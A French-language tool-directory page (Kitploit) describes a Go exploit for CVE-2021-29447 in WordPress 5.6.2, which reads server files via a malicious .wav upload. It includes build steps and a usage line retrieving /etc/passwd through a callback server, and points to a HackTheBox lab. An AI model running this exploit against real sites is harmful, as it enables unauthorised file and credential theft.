Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
exploit_cve-2021-29447 — Exploit basé sur Go pour CVE-2021-29447 ciblant WordPress 5.6.2 avec PHP 8. Génère une charge utile .wav malveillante pour récupérer des fichiers arbitraires du serveur via le téléchargement de médias, nécessitant un accès de base wp-admin. | Kitploit
Outils/GitHubGitHub/mega8bit/exploit_cve-2021-29447
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubmega8bit/exploit_cve-2021-29447

exploit_cve-2021-29447

Exploit basé sur Go pour CVE-2021-29447 ciblant WordPress 5.6.2 avec PHP 8. Génère une charge utile .wav malveillante pour récupérer des fichiers arbitraires du serveur via le téléchargement de médias, nécessitant un accès de base wp-admin.

Voir le dépôt
71il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

exploit_cve-2021-29447

À des fins éducatives uniquement.

Cet exploit est censé être un outil vraiment pratique pour obtenir n'importe quel fichier d'un serveur exécutant WordPress 5.6.2 et php8. (voir https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5)

Tout ce dont vous avez besoin est un accès wp-admin de base et la capacité de télécharger un fichier média.

L'exploit générera une charge utile de fichier .wav à télécharger via wp-admin.

Ensuite, il utilise le serveur arrière de l'exploit pour vous donner le fichier directement sur votre console.

L'utilisation parfaite est la machine HackTheBox - metatwo https://www.hackthebox.com/machines/metatwo

til

Utilisation/Exemples

root@kitploit:~
$ go build

$ chmod +x exploit_cve-2021-29447

$ ./exploit_cve-2021-29447 --help                                               
Usage of ./exploit_cve-2021-29447:
  -local-server-ip string
        Use local server ip where a local server will be set
  -local-server-port int
        Use local server port to run local server on
  -o string
        Output file to save exploit's result
  -target-path string
        Use target path to point on file you want to get from target server

$ ./exploit_cve-2021-29447 -local-server-ip=<your ip address> -target-path=/etc/passwd

Télécharger l’outil